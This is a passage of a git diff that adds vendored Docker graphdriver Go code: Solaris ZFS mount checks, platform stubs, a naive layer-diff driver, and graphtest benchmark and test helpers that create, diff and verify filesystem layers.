+	FsMagicZfs = FsMagic(0x2fc12fc1)
+)
+
+var (
+	// Slice of drivers that should be used in an order
+	priority = []string{
+		"zfs",
+	}
+
+	// FsNames maps filesystem id to name of the filesystem.
+	FsNames = map[FsMagic]string{
+		FsMagicZfs: "zfs",
+	}
+)
+
+// GetFSMagic returns the filesystem id given the path.
+func GetFSMagic(rootpath string) (FsMagic, error) {
+	return 0, nil
+}
+
+type fsChecker struct {
+	t FsMagic
+}
+
+func (c *fsChecker) IsMounted(path string) bool {
+	m, _ := Mounted(c.t, path)
+	return m
+}
+
+// NewFsChecker returns a checker configured for the provied FsMagic
+func NewFsChecker(t FsMagic) Checker {
+	return &fsChecker{
+		t: t,
+	}
+}
+
+// NewDefaultChecker returns a check that parses /proc/mountinfo to check
+// if the specified path is mounted.
+// No-op on Solaris.
+func NewDefaultChecker() Checker {
+	return &defaultChecker{}
+}
+
+type defaultChecker struct {
+}
+
+func (c *defaultChecker) IsMounted(path string) bool {
+	m, _ := mount.Mounted(path)
+	return m
+}
+
+// Mounted checks if the given path is mounted as the fs type
+//Solaris supports only ZFS for now
+func Mounted(fsType FsMagic, mountPath string) (bool, error) {
+
+	cs := C.CString(filepath.Dir(mountPath))
+	buf := C.getstatfs(cs)
+
+	// on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ]
+	if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) ||
+		(buf.f_basetype[3] != 0) {
+		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", mountPath)
+		C.free(unsafe.Pointer(buf))
+		return false, ErrPrerequisites
+	}
+
+	C.free(unsafe.Pointer(buf))
+	C.free(unsafe.Pointer(cs))
+	return true, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go
new file mode 100644
index 0000000000..4a875608b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go
@@ -0,0 +1,15 @@
+// +build !linux,!windows,!freebsd,!solaris
+
+package graphdriver
+
+var (
+	// Slice of drivers that should be used in an order
+	priority = []string{
+		"unsupported",
+	}
+)
+
+// GetFSMagic returns the filesystem id given the path.
+func GetFSMagic(rootpath string) (FsMagic, error) {
+	return FsMagicUnsupported, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go
new file mode 100644
index 0000000000..ffd30c2950
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go
@@ -0,0 +1,14 @@
+package graphdriver
+
+var (
+	// Slice of drivers that should be used in order
+	priority = []string{
+		"windowsfilter",
+	}
+)
+
+// GetFSMagic returns the filesystem id given the path.
+func GetFSMagic(rootpath string) (FsMagic, error) {
+	// Note it is OK to return FsMagicUnsupported on Windows.
+	return FsMagicUnsupported, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go
new file mode 100644
index 0000000000..20826cd7d2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go
@@ -0,0 +1,169 @@
+package graphdriver
+
+import (
+	"io"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+var (
+	// ApplyUncompressedLayer defines the unpack method used by the graph
+	// driver.
+	ApplyUncompressedLayer = chrootarchive.ApplyUncompressedLayer
+)
+
+// NaiveDiffDriver takes a ProtoDriver and adds the
+// capability of the Diffing methods which it may or may not
+// support on its own. See the comment on the exported
+// NewNaiveDiffDriver function below.
+// Notably, the AUFS driver doesn't need to be wrapped like this.
+type NaiveDiffDriver struct {
+	ProtoDriver
+	uidMaps []idtools.IDMap
+	gidMaps []idtools.IDMap
+}
+
+// NewNaiveDiffDriver returns a fully functional driver that wraps the
+// given ProtoDriver and adds the capability of the following methods which
+// it may or may not support on its own:
+//     Diff(id, parent string) (archive.Archive, error)
+//     Changes(id, parent string) ([]archive.Change, error)
+//     ApplyDiff(id, parent string, diff archive.Reader) (size int64, err error)
+//     DiffSize(id, parent string) (size int64, err error)
+func NewNaiveDiffDriver(driver ProtoDriver, uidMaps, gidMaps []idtools.IDMap) Driver {
+	return &NaiveDiffDriver{ProtoDriver: driver,
+		uidMaps: uidMaps,
+		gidMaps: gidMaps}
+}
+
+// Diff produces an archive of the changes between the specified
+// layer and its parent layer which may be "".
+func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err error) {
+	startTime := time.Now()
+	driver := gdw.ProtoDriver
+
+	layerFs, err := driver.Get(id, "")
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			driver.Put(id)
+		}
+	}()
+
+	if parent == "" {
+		archive, err := archive.Tar(layerFs, archive.Uncompressed)
+		if err != nil {
+			return nil, err
+		}
+		return ioutils.NewReadCloserWrapper(archive, func() error {
+			err := archive.Close()
+			driver.Put(id)
+			return err
+		}), nil
+	}
+
+	parentFs, err := driver.Get(parent, "")
+	if err != nil {
+		return nil, err
+	}
+	defer driver.Put(parent)
+
+	changes, err := archive.ChangesDirs(layerFs, parentFs)
+	if err != nil {
+		return nil, err
+	}
+
+	archive, err := archive.ExportChanges(layerFs, changes, gdw.uidMaps, gdw.gidMaps)
+	if err != nil {
+		return nil, err
+	}
+
+	return ioutils.NewReadCloserWrapper(archive, func() error {
+		err := archive.Close()
+		driver.Put(id)
+
+		// NaiveDiffDriver compares file metadata with parent layers. Parent layers
+		// are extracted from tar's with full second precision on modified time.
+		// We need this hack here to make sure calls within same second receive
+		// correct result.
+		time.Sleep(startTime.Truncate(time.Second).Add(time.Second).Sub(time.Now()))
+		return err
+	}), nil
+}
+
+// Changes produces a list of changes between the specified layer
+// and its parent layer. If parent is "", then all changes will be ADD changes.
+func (gdw *NaiveDiffDriver) Changes(id, parent string) ([]archive.Change, error) {
+	driver := gdw.ProtoDriver
+
+	layerFs, err := driver.Get(id, "")
+	if err != nil {
+		return nil, err
+	}
+	defer driver.Put(id)
+
+	parentFs := ""
+
+	if parent != "" {
+		parentFs, err = driver.Get(parent, "")
+		if err != nil {
+			return nil, err
+		}
+		defer driver.Put(parent)
+	}
+
+	return archive.ChangesDirs(layerFs, parentFs)
+}
+
+// ApplyDiff extracts the changeset from the given diff into the
+// layer with the specified id and parent, returning the size of the
+// new layer in bytes.
+func (gdw *NaiveDiffDriver) ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) {
+	driver := gdw.ProtoDriver
+
+	// Mount the root filesystem so we can apply the diff/layer.
+	layerFs, err := driver.Get(id, "")
+	if err != nil {
+		return
+	}
+	defer driver.Put(id)
+
+	options := &archive.TarOptions{UIDMaps: gdw.uidMaps,
+		GIDMaps: gdw.gidMaps}
+	start := time.Now().UTC()
+	logrus.Debug("Start untar layer")
+	if size, err = ApplyUncompressedLayer(layerFs, diff, options); err != nil {
+		return
+	}
+	logrus.Debugf("Untar time: %vs", time.Now().UTC().Sub(start).Seconds())
+
+	return
+}
+
+// DiffSize calculates the changes between the specified layer
+// and its parent and returns the size in bytes of the changes
+// relative to its base filesystem directory.
+func (gdw *NaiveDiffDriver) DiffSize(id, parent string) (size int64, err error) {
+	driver := gdw.ProtoDriver
+
+	changes, err := gdw.Changes(id, parent)
+	if err != nil {
+		return
+	}
+
+	layerFs, err := driver.Get(id, "")
+	if err != nil {
+		return
+	}
+	defer driver.Put(id)
+
+	return archive.ChangesSize(layerFs, changes), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go
new file mode 100644
index 0000000000..def822b9a1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go
@@ -0,0 +1,259 @@
+// +build linux freebsd
+
+package graphtest
+
+import (
+	"bytes"
+	"io"
+	"io/ioutil"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/pkg/stringid"
+)
+
+// DriverBenchExists benchmarks calls to exist
+func DriverBenchExists(b *testing.B, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+
+	base := stringid.GenerateRandomID()
+
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		if !driver.Exists(base) {
+			b.Fatal("Newly created image doesn't exist")
+		}
+	}
+}
+
+// DriverBenchGetEmpty benchmarks calls to get on an empty layer
+func DriverBenchGetEmpty(b *testing.B, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+
+	base := stringid.GenerateRandomID()
+
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		_, err := driver.Get(base, "")
+		b.StopTimer()
+		if err != nil {
+			b.Fatalf("Error getting mount: %s", err)
+		}
+		if err := driver.Put(base); err != nil {
+			b.Fatalf("Error putting mount: %s", err)
+		}
+		b.StartTimer()
+	}
+}
+
+// DriverBenchDiffBase benchmarks calls to diff on a root layer
+func DriverBenchDiffBase(b *testing.B, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+
+	base := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := addFiles(driver, base, 3); err != nil {
+		b.Fatal(err)
+	}
+
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		arch, err := driver.Diff(base, "")
+		if err != nil {
+			b.Fatal(err)
+		}
+		_, err = io.Copy(ioutil.Discard, arch)
+		if err != nil {
+			b.Fatalf("Error copying archive: %s", err)
+		}
+		arch.Close()
+	}
+}
+
+// DriverBenchDiffN benchmarks calls to diff on two layers with
+// a provided number of files on the lower and upper layers.
+func DriverBenchDiffN(b *testing.B, bottom, top int, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+	base := stringid.GenerateRandomID()
+	upper := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, base, bottom, 3); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := driver.Create(upper, base, nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, upper, top, 6); err != nil {
+		b.Fatal(err)
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		arch, err := driver.Diff(upper, "")
+		if err != nil {
+			b.Fatal(err)
+		}
+		_, err = io.Copy(ioutil.Discard, arch)
+		if err != nil {
+			b.Fatalf("Error copying archive: %s", err)
+		}
+		arch.Close()
+	}
+}
+
+// DriverBenchDiffApplyN benchmarks calls to diff and apply together
+func DriverBenchDiffApplyN(b *testing.B, fileCount int, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+	base := stringid.GenerateRandomID()
+	upper := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, base, fileCount, 3); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := driver.Create(upper, base, nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, upper, fileCount, 6); err != nil {
+		b.Fatal(err)
+	}
+	diffSize, err := driver.DiffSize(upper, "")
+	if err != nil {
+		b.Fatal(err)
+	}
+	b.ResetTimer()
+	b.StopTimer()
+	for i := 0; i < b.N; i++ {
+		diff := stringid.GenerateRandomID()
+		if err := driver.Create(diff, base, nil); err != nil {
+			b.Fatal(err)
+		}
+
+		if err := checkManyFiles(driver, diff, fileCount, 3); err != nil {
+			b.Fatal(err)
+		}
+
+		b.StartTimer()
+
+		arch, err := driver.Diff(upper, "")
+		if err != nil {
+			b.Fatal(err)
+		}
+
+		applyDiffSize, err := driver.ApplyDiff(diff, "", arch)
+		if err != nil {
+			b.Fatal(err)
+		}
+
+		b.StopTimer()
+		arch.Close()
+
+		if applyDiffSize != diffSize {
+			// TODO: enforce this
+			//b.Fatalf("Apply diff size different, got %d, expected %s", applyDiffSize, diffSize)
+		}
+		if err := checkManyFiles(driver, diff, fileCount, 6); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+// DriverBenchDeepLayerDiff benchmarks calls to diff on top of a given number of layers.
+func DriverBenchDeepLayerDiff(b *testing.B, layerCount int, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+
+	base := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := addFiles(driver, base, 50); err != nil {
+		b.Fatal(err)
+	}
+
+	topLayer, err := addManyLayers(driver, base, layerCount)
+	if err != nil {
+		b.Fatal(err)
+	}
+
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		arch, err := driver.Diff(topLayer, "")
+		if err != nil {
+			b.Fatal(err)
+		}
+		_, err = io.Copy(ioutil.Discard, arch)
+		if err != nil {
+			b.Fatalf("Error copying archive: %s", err)
+		}
+		arch.Close()
+	}
+}
+
+// DriverBenchDeepLayerRead benchmarks calls to read a file under a given number of layers.
+func DriverBenchDeepLayerRead(b *testing.B, layerCount int, drivername string, driveroptions ...string) {
+	driver := GetDriver(b, drivername, driveroptions...)
+	defer PutDriver(b)
+
+	base := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	content := []byte("test content")
+	if err := addFile(driver, base, "testfile.txt", content); err != nil {
+		b.Fatal(err)
+	}
+
+	topLayer, err := addManyLayers(driver, base, layerCount)
+	if err != nil {
+		b.Fatal(err)
+	}
+
+	root, err := driver.Get(topLayer, "")
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer driver.Put(topLayer)
+
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+
+		// Read content
+		c, err := ioutil.ReadFile(filepath.Join(root, "testfile.txt"))
+		if err != nil {
+			b.Fatal(err)
+		}
+
+		b.StopTimer()
+		if bytes.Compare(c, content) != 0 {
+			b.Fatalf("Wrong content in file %v, expected %v", c, content)
+		}
+		b.StartTimer()
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go
new file mode 100644
index 0000000000..6e952de78b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go
@@ -0,0 +1,358 @@
+// +build linux freebsd solaris
+
+package graphtest
+
+import (
+	"bytes"
+	"io/ioutil"
+	"math/rand"
+	"os"
+	"path"
+	"reflect"
+	"syscall"
+	"testing"
+	"unsafe"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/go-units"
+)
+
+var (
+	drv *Driver
+)
+
+// Driver conforms to graphdriver.Driver interface and
+// contains information such as root and reference count of the number of clients using it.
+// This helps in testing drivers added into the framework.
+type Driver struct {
+	graphdriver.Driver
+	root     string
+	refCount int
+}
+
+func newDriver(t testing.TB, name string, options []string) *Driver {
+	root, err := ioutil.TempDir("", "docker-graphtest-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.MkdirAll(root, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	d, err := graphdriver.GetDriver(name, nil, graphdriver.Options{DriverOptions: options, Root: root})
+	if err != nil {
+		t.Logf("graphdriver: %v\n", err)
+		if err == graphdriver.ErrNotSupported || err == graphdriver.ErrPrerequisites || err == graphdriver.ErrIncompatibleFS {
+			t.Skipf("Driver %s not supported", name)
+		}
+		t.Fatal(err)
+	}
+	return &Driver{d, root, 1}
+}
+
+func cleanup(t testing.TB, d *Driver) {
+	if err := drv.Cleanup(); err != nil {
+		t.Fatal(err)
+	}
+	os.RemoveAll(d.root)
+}
+
+// GetDriver create a new driver with given name or return an existing driver with the name updating the reference count.
+func GetDriver(t testing.TB, name string, options ...string) graphdriver.Driver {
+	if drv == nil {
+		drv = newDriver(t, name, options)
+	} else {
+		drv.refCount++
+	}
+	return drv
+}
+
+// PutDriver removes the driver if it is no longer used and updates the reference count.
+func PutDriver(t testing.TB) {
+	if drv == nil {
+		t.Skip("No driver to put!")
+	}
+	drv.refCount--
+	if drv.refCount == 0 {
+		cleanup(t, drv)
+		drv = nil
+	}
+}
+
+// DriverTestCreateEmpty creates a new image and verifies it is empty and the right metadata
+func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...string) {
+	driver := GetDriver(t, drivername, driverOptions...)
+	defer PutDriver(t)
+
+	if err := driver.Create("empty", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	defer func() {
+		if err := driver.Remove("empty"); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	if !driver.Exists("empty") {
+		t.Fatal("Newly created image doesn't exist")
+	}
+
+	dir, err := driver.Get("empty", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	verifyFile(t, dir, 0755|os.ModeDir, 0, 0)
+
+	// Verify that the directory is empty
+	fis, err := readDir(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(fis) != 0 {
+		t.Fatal("New directory not empty")
+	}
+
+	driver.Put("empty")
+}
+
+// DriverTestCreateBase create a base driver and verify.
+func DriverTestCreateBase(t testing.TB, drivername string, driverOptions ...string) {
+	driver := GetDriver(t, drivername, driverOptions...)
+	defer PutDriver(t)
+
+	createBase(t, driver, "Base")
+	defer func() {
+		if err := driver.Remove("Base"); err != nil {
+			t.Fatal(err)
+		}
+	}()
+	verifyBase(t, driver, "Base")
+}
+
+// DriverTestCreateSnap Create a driver and snap and verify.
+func DriverTestCreateSnap(t testing.TB, drivername string, driverOptions ...string) {
+	driver := GetDriver(t, drivername, driverOptions...)
+	defer PutDriver(t)
+
+	createBase(t, driver, "Base")
+
+	defer func() {
+		if err := driver.Remove("Base"); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	if err := driver.Create("Snap", "Base", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	defer func() {
+		if err := driver.Remove("Snap"); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	verifyBase(t, driver, "Snap")
+}
+
+// DriverTestDeepLayerRead reads a file from a lower layer under a given number of layers
+func DriverTestDeepLayerRead(t testing.TB, layerCount int, drivername string, driverOptions ...string) {
+	driver := GetDriver(t, drivername, driverOptions...)
+	defer PutDriver(t)
+
+	base := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	content := []byte("test content")
+	if err := addFile(driver, base, "testfile.txt", content); err != nil {
+		t.Fatal(err)
+	}
+
+	topLayer, err := addManyLayers(driver, base, layerCount)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = checkManyLayers(driver, topLayer, layerCount)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := checkFile(driver, topLayer, "testfile.txt", content); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// DriverTestDiffApply tests diffing and applying produces the same layer
+func DriverTestDiffApply(t testing.TB, fileCount int, drivername string, driverOptions ...string) {
+	driver := GetDriver(t, drivername, driverOptions...)
+	defer PutDriver(t)
+	base := stringid.GenerateRandomID()
+	upper := stringid.GenerateRandomID()
+	deleteFile := "file-remove.txt"
+	deleteFileContent := []byte("This file should get removed in upper!")
+	deleteDir := "var/lib"
+
+	if err := driver.Create(base, "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, base, fileCount, 3); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := addFile(driver, base, deleteFile, deleteFileContent); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := addDirectory(driver, base, deleteDir); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := driver.Create(upper, base, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, upper, fileCount, 6); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := removeAll(driver, upper, deleteFile, deleteDir); err != nil {
+		t.Fatal(err)
+	}
+
+	diffSize, err := driver.DiffSize(upper, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	diff := stringid.GenerateRandomID()
+	if err := driver.Create(diff, base, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := checkManyFiles(driver, diff, fileCount, 3); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := checkFile(driver, diff, deleteFile, deleteFileContent); err != nil {
+		t.Fatal(err)
+	}
+
+	arch, err := driver.Diff(upper, base)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	buf := bytes.NewBuffer(nil)
+	if _, err := buf.ReadFrom(arch); err != nil {
+		t.Fatal(err)
+	}
+	if err := arch.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	applyDiffSize, err := driver.ApplyDiff(diff, base, bytes.NewReader(buf.Bytes()))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if applyDiffSize != diffSize {
+		t.Fatalf("Apply diff size different, got %d, expected %d", applyDiffSize, diffSize)
+	}
+
+	if err := checkManyFiles(driver, diff, fileCount, 6); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := checkFileRemoved(driver, diff, deleteFile); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := checkFileRemoved(driver, diff, deleteDir); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// DriverTestChanges tests computed changes on a layer matches changes made
+func DriverTestChanges(t testing.TB, drivername string, driverOptions ...string) {
+	driver := GetDriver(t, drivername, driverOptions...)
+	defer PutDriver(t)
+	base := stringid.GenerateRandomID()
+	upper := stringid.GenerateRandomID()
+	if err := driver.Create(base, "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := addManyFiles(driver, base, 20, 3); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := driver.Create(upper, base, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	expectedChanges, err := changeManyFiles(driver, upper, 20, 6)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err := driver.Changes(upper, base)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err = checkChanges(expectedChanges, changes); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func writeRandomFile(path string, size uint64) error {
+	buf := make([]int64, size/8)
+
+	r := rand.NewSource(0)
+	for i := range buf {
+		buf[i] = r.Int63()
+	}
+
+	// Cast to []byte
+	header := *(*reflect.SliceHeader)(unsafe.Pointer(&buf))
+	header.Len *= 8
+	header.Cap *= 8
+	data := *(*[]byte)(unsafe.Pointer(&header))
+
+	return ioutil.WriteFile(path, data, 0700)
+}
+
+// DriverTestSetQuota Create a driver and test setting quota.
+func DriverTestSetQuota(t *testing.T, drivername string) {
+	driver := GetDriver(t, drivername)
+	defer PutDriver(t)
+
+	createBase(t, driver, "Base")
+	createOpts := &graphdriver.CreateOpts{}
+	createOpts.StorageOpt = make(map[string]string, 1)
+	createOpts.StorageOpt["size"] = "50M"
+	if err := driver.Create("zfsTest", "Base", createOpts); err != nil {
+		t.Fatal(err)
+	}
+
+	mountPath, err := driver.Get("zfsTest", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	quota := uint64(50 * units.MiB)
+	err = writeRandomFile(path.Join(mountPath, "file"), quota*2)
+	if pathError, ok := err.(*os.PathError); ok && pathError.Err != syscall.EDQUOT {
+		t.Fatalf("expect write() to fail with %v, got %v", syscall.EDQUOT, err)
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go
new file mode 100644
index 0000000000..a50c5211e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go
@@ -0,0 +1 @@
+package graphtest
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go
new file mode 100644
index 0000000000..35bf6d17ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go
@@ -0,0 +1,342 @@
+package graphtest
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"math/rand"
+	"os"
+	"path"
+	"sort"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+func randomContent(size int, seed int64) []byte {
+	s := rand.NewSource(seed)
+	content := make([]byte, size)
+
+	for i := 0; i < len(content); i += 7 {
+		val := s.Int63()
+		for j := 0; i+j < len(content) && j < 7; j++ {
+			content[i+j] = byte(val)
+			val >>= 8
+		}
+	}
+
+	return content
+}
+
+func addFiles(drv graphdriver.Driver, layer string, seed int64) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	if err := ioutil.WriteFile(path.Join(root, "file-a"), randomContent(64, seed), 0755); err != nil {
+		return err
+	}
+	if err := os.MkdirAll(path.Join(root, "dir-b"), 0755); err != nil {
+		return err
+	}
+	if err := ioutil.WriteFile(path.Join(root, "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil {
+		return err
+	}
+
+	return ioutil.WriteFile(path.Join(root, "file-c"), randomContent(128*128, seed+2), 0755)
+}
+
+func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	fileContent, err := ioutil.ReadFile(path.Join(root, filename))
+	if err != nil {
+		return err
+	}
+
+	if bytes.Compare(fileContent, content) != 0 {
+		return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content)
+	}
+
+	return nil
+}
+
+func addFile(drv graphdriver.Driver, layer, filename string, content []byte) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	return ioutil.WriteFile(path.Join(root, filename), content, 0755)
+}
+
+func addDirectory(drv graphdriver.Driver, layer, dir string) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	return os.MkdirAll(path.Join(root, dir), 0755)
+}
+
+func removeAll(drv graphdriver.Driver, layer string, names ...string) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	for _, filename := range names {
+		if err := os.RemoveAll(path.Join(root, filename)); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func checkFileRemoved(drv graphdriver.Driver, layer, filename string) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	if _, err := os.Stat(path.Join(root, filename)); err == nil {
+		return fmt.Errorf("file still exists: %s", path.Join(root, filename))
+	} else if !os.IsNotExist(err) {
+		return err
+	}
+
+	return nil
+}
+
+func addManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	for i := 0; i < count; i += 100 {
+		dir := path.Join(root, fmt.Sprintf("directory-%d", i))
+		if err := os.MkdirAll(dir, 0755); err != nil {
+			return err
+		}
+		for j := 0; i+j < count && j < 100; j++ {
+			file := path.Join(dir, fmt.Sprintf("file-%d", i+j))
+			if err := ioutil.WriteFile(file, randomContent(64, seed+int64(i+j)), 0755); err != nil {
+				return err
+			}
+		}
+	}
+
+	return nil
+}
+
+func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) ([]archive.Change, error) {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return nil, err
+	}
+	defer drv.Put(layer)
+
+	changes := []archive.Change{}
+	for i := 0; i < count; i += 100 {
+		archiveRoot := fmt.Sprintf("/directory-%d", i)
+		if err := os.MkdirAll(path.Join(root, archiveRoot), 0755); err != nil {
+			return nil, err
+		}
+		for j := 0; i+j < count && j < 100; j++ {
+			if j == 0 {
+				changes = append(changes, archive.Change{
+					Path: archiveRoot,
+					Kind: archive.ChangeModify,
+				})
+			}
+			var change archive.Change
+			switch j % 3 {
+			// Update file
+			case 0:
+				change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j))
+				change.Kind = archive.ChangeModify
+				if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil {
+					return nil, err
+				}
+			// Add file
+			case 1:
+				change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j))
+				change.Kind = archive.ChangeAdd
+				if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil {
+					return nil, err
+				}
+			// Remove file
+			case 2:
+				change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j))
+				change.Kind = archive.ChangeDelete
+				if err := os.Remove(path.Join(root, change.Path)); err != nil {
+					return nil, err
+				}
+			}
+			changes = append(changes, change)
+		}
+	}
+
+	return changes, nil
+}
+
+func checkManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
